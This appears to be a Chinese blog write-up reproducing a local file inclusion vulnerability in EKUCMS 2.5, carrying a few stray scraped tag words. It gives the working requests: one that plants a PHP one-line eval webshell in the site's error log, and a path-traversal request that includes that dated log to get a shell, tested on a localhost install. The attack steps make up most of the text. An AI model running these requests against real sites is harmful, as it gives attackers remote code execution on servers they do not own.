易酷 cms2.5 本地文件包含漏洞 getshellphp
首先下載源碼安裝(http://127.0.0.1/test/ekucms2.5/install.php)python
安裝成功直接進行復現吧shell
本地包含一句話木馬網站
http://127.0.0.1/test/ekucms2.5/?s=my/show/id/{~eval($_POST[orange])}
會在網站的/temp/Logs/目錄下生成一個錯誤日誌,命名規則爲年_月_日3d
錯誤日誌內容日誌
進行包含錯誤日誌,地址:blog
http://127.0.0.1/test/ekucms2.5/?s=my/show/id/\..\temp\logs\18_04_18.log
驗證下:get
源碼連接(連接: https://pan.baidu.com/s/1K8dmimbrqO41tNemhnKeAQ 密碼: 3y48)源碼